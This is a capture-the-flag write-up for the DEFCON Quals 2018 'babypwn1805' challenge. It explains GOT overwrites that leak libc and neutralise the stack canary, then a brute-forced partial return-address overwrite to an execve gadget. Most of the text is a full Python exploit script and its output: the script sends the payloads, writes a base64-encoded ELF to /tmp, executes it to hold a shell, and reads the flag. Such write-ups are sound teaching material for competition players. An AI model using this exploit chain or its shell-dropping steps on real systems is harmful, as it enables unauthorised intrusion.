DEFCON Quals 2018: "babypwn1805" writeup
This “baby” task consisted of exploiting the following short C program without being given the compiled binary:
/* includes omitted */
char asdf[1024];
int main()
{
long long index = 0;
alarm(5);
read(0, &index, 1024);
read(0, asdf+index, 8);
read(0, &index, 1024);
}
First of all, sending long strings threw a stack canary error, so we knew those needed to be circumvented somehow.
To acquire information on the environment, we guessed the offset to the GOT
entry of read (-0x38 from the buffer), guessed that read and write share their
address in the libc except for the least significant byte (they’re usually
close), overwrite the LSB of read() to hopefully turn it into a write()
to leak 1024 bytes to stdin (which here was the same socket as stdout).
For us, 0x60 as the LSB worked. This leak sometimes included environment
variables, among those the libc filename which contained a hash. With that
hash that specific libc could be found online. The libc was randomized on
every connection; we used MD5 ac6e8213081cc6f5a16779214a90d952.
Once we found that libc, we filtered for it every time before trying to run the exploit by simply applying the same changes to the GOT and seeing if something came back from the server. If yes then the current connection had the right libc and we could attack the binary every 5 seconds up to 200 times (as it turned out).
To exploit the program, we
then guessed some more offsets based on a locally compiled version of the
binary: We assumed the GOT entry of __stack_chk_fail to be at -0x48 from
the buffer and that there would be a ret instruction at the location obtained
from the original GOT entry by overwriting the LSB with 0x96.
(Note that the GOT entry still points into the binary rather than libc since
it’s never been called.) Amazingly, even the guess of 0x96 was correct.
After negating the stack canaries by pointing the GOT entry of the function
__stack_chk_fail to a ret, we simply did a partial overwrite on the return
address of main() to a “win” gadget in the libc we found earlier. This
involves a brute force of 12 bits since the offset of the original return
address (0x21ec5, somewhere in __libc_start_main) is quite far from the
win gadget we used:
e681d: 48 8b 05 84 76 2d 00 mov rax, [rip+0x2d7684]
e6824: 48 8d 74 24 70 lea rsi, [rsp+0x70]
e6829: 48 8d 3d ab 64 09 00 lea rdi, [rip+0x964ab]
e6830: 48 8b 10 mov rdx, [rax]
e6833: e8 f8 aa fd ff call c1330 <execve@@GLIBC_2.2.5>
Since the alarm(5) would kill the (sometimes) resulting shell quite soon,
our first-stage payload was a small ELF (written to /tmp/) that would just
call alarm(0) and execve /bin/sh once more. Finding the flag was
still super annoying because it was in a directory inside /opt/ which
wasn’t readable to our user (the CTF organizers announced this was by accident)
but finally we found the right folder by looking at the environment
variable OLDPWD of the pwnable instance which pointed to
/opt/ctf/babypwn/home/ (see the output below).
The final exploit script:
#!/usr/bin/env python3
import sys, socket, time, re, subprocess, struct, telnetlib
import hashlib
def pow_hash(challenge, solution):
return hashlib.sha256(challenge.encode('ascii') + struct.pack('<Q', solution)).hexdigest()
def check_pow(challenge, n, solution):
h = pow_hash(challenge, solution)
return (int(h, 16) % (2**n)) == 0
def solve_pow(challenge, n):
candidate = 0
while True:
if check_pow(challenge, n, candidate):
return candidate
candidate += 1
def reconnect():
sock = socket.socket()
sock.connect(('e4771e24.quals2018.oooverflow.io', 31337))
time.sleep(1)
s = sock.recv(0x100).decode()
chall = re.search('Challenge: (.{10})', s).groups()[0]
n = int(re.search('n: ([0-9]+)', s).groups()[0])
resp = solve_pow(chall, n)
sock.send('{}\n'.format(resp).encode())
s = sock.recv(0x100)
if s != b'Go\n':
print(s)
exit(1)
return sock
wait = lambda: (sys.stdout.flush(), time.sleep(.3))
for i in range(0x100):
sock = reconnect()
sock.send(struct.pack('<q', -0x38))
print('.', end = ''); wait()
sock.send(b'\x60') # read -> write
print('.', end = ''); wait()
print('?', end = ' '); wait()
s = sock.recv(0x1000)
print(s)
if b'\xc8\xff\xff\xff' not in s:
continue
for j in range(199):
print('{:5d}'.format(j), end = ' ')
sock.sendall(struct.pack('<q', -0x48))
print('.', end = ''); wait()
sock.sendall(b'\x96') # stack_chk_fail -> ret
print('.', end = ''); wait()
sock.sendall(
b'X' * 8 # index
+ b'C' * 8 # cookie
+ b'\0' * 8 # saved rbp
+ b'\x1d\x78\x78' # partial overwrite -> win
)
print('!', end = ''); wait()
sock.sendall(b'echo ')
print('.', end = ''); wait()
sock.sendall(b'pwnd\n')
print('?', end = ' '); wait()
s = sock.recv(0x1000)
print(s)
if b'pwnd' in s:
sock.send(b'export LD_PRELOAD=\n')
sock.send(b'id; echo\n')
sock.send(b'pwd; echo\n')
sock.send(b'env; echo\n')
# sock.send(b'find / | LD_PRELOAD= grep -i flag; echo\n')
sock.send(b'echo f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAANAAAAAAAAAAAAAAAEAAOAABAEAAAwACAAEAAAAFAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAuQAAAAAAAAC5AAAAAAAAAAAAIAAAAAAAMf+4JQAAAA8FSI08JaEAQABIjTQlqQBAAEiNFCWxAEAAuDsAAAAPBcwvYmluL3NoAKEAQAAAAAAAAAAAAAAAAAAALnNoc3RydGFiAC50ZXh0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALAAAAAQAAAAYAAAAAAAAAeABAAAAAAAB4AAAAAAAAAEEAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAQAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAuQAAAAAAAAARAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAA== | base64 -d > /tmp/pU0Kp9cuUDMuK1yRn4QC6gUO5KbK1vns\n')
sock.send(b'chmod +x /tmp/pU0Kp9cuUDMuK1yRn4QC6gUO5KbK1vns\n')
sock.send(b'echo payload?\n')
sock.send(b'exec /tmp/pU0Kp9cuUDMuK1yRn4QC6gUO5KbK1vns\n')
wait()
sock.send(b'echo still there.\n')
sock.send(b'rm /tmp/pU0Kp9cuUDMuK1yRn4QC6gUO5KbK1vns\n')
sock.send(b'echo shell!\n')
sock.send(b'cat /opt/ctf/babypwn/home/flag\n') # added after I found it
print('\n$$$$$$$$$$$$$$$$\n')
tel = telnetlib.Telnet()
tel.sock = sock
tel.interact()
exit()
Among other things, running (multiple parallel instances of) this script for long enough finally returns with a shell and, once we found the right path, the flag:
..? b"\xc8\xff\xff\xff\xff\xff\xff\xff\x00\xe8M\x98j\xb6\xe3\xb3\x00\x00\x00\x00\x00\x00\x00\x00\xc5\x9e\x10\xd3\xa0\x7f\x00\x00\x005\x95uGV\x00\x00\xf8\xb5u\x8b\xfd\x7f\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xfa6\x95uGV\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd6\x9b\x9f\xcb\xcbz\x11\xf4\xf05\x95uGV\x00\x00\xf0\xb5u\x8b\xfd\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd6\x9b\xdf\xa1 l\xea\x0b\xd6\x9be\xf7\xea\xdcP\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x003\xd7K\xd3\xa0\x7f\x00\x00`'J\xd3\xa0\x7f\x00\x00\xf3F\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf05\x95uGV\x00\x00\xf0\xb5u\x8b\xfd\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a6\x95uGV\x00\x00\xe8\xb5u\x8b\xfd\x7f\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00e\xceu\x8b\xfd\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\xceu\x8b\xfd\x7f\x00\x00\xcd\xceu\x8b\xfd\x7f\x00\x00\xda\xceu\x8b\xfd\x7f\x00\x00\xf7\xceu\x8b\xfd\x7f\x00\x00&\xcfu\x8b\xfd\x7f\x00\x00?\xcfu\x8b\xfd\x7f\x00\x00W\xcfu\x8b\xfd\x7f\x00\x00x\xcfu\x8b\xfd\x7f\x00\x00\x80\xcfu\x8b\xfd\x7f\x00\x00\xc2\xcfu\x8b\xfd\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00!\x00\x00\x00\x00\x00\x00\x00\x00\xb0|\x8b\xfd\x7f\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\xff\xfb\x8b\x17\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00d\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00@0\x95uGV\x00\x00\x04\x00\x00\x00\x00\x00\x00\x008\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\xd0J\xd3\xa0\x7f\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00\x00\x00\x00\x00\xf05\x95uGV\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\xf2\x03\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\xf2\x03\x00\x00\x00\x00\x00\x00\r\x00\x00\x00\x00\x00\x00\x00\xf2\x03\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\xf2\x03\x00\x00\x00\x00\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00\xa9\xb7u\x8b\xfd\x7f\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\xde\xcfu\x8b\xfd\x7f\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\xb9\xb7u\x8b\xfd\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00]\xe8M\x98j\xb6\xe3\xb3\xcf\xe5e\xbd\x08z\xeb\xcdx86_64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00Go\n"
0 ..!.? b'Go\nGo\n'
1 ..!.? b'Go\nGo\n'
2 ..!.? b'Go\nGo\n'
3 ..!.? b'Go\nGo\n'
[...]
101 ..!.? b'Go\nGo\n'
102 ..!.? b'Go\nGo\n'
103 ..!.? b'Go\nGo\n'
104 ..!.? b'pwnd\n'
$$$$$$$$$$$$$$$$
uid=1010(babypwn) gid=1010(babypwn) groups=1010(babypwn)
/opt/ctf/babypwn/bin
REMOTE_HOST=::ffff:1.3.3.7
SHLVL=2
OLDPWD=/opt/ctf/babypwn/home
JOURNAL_STREAM=9:580166
_=/opt/ctf/babypwn/bin/baby
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
INVOCATION_ID=dc0f79078667c9c2425f6cb008d64e76
LD_PRELOAD=
LANG=C.UTF-8
PWD=/opt/ctf/babypwn/bin
payload?
still there.
shell!
OOO{to_know_the_libc_you_must_become_the_libc}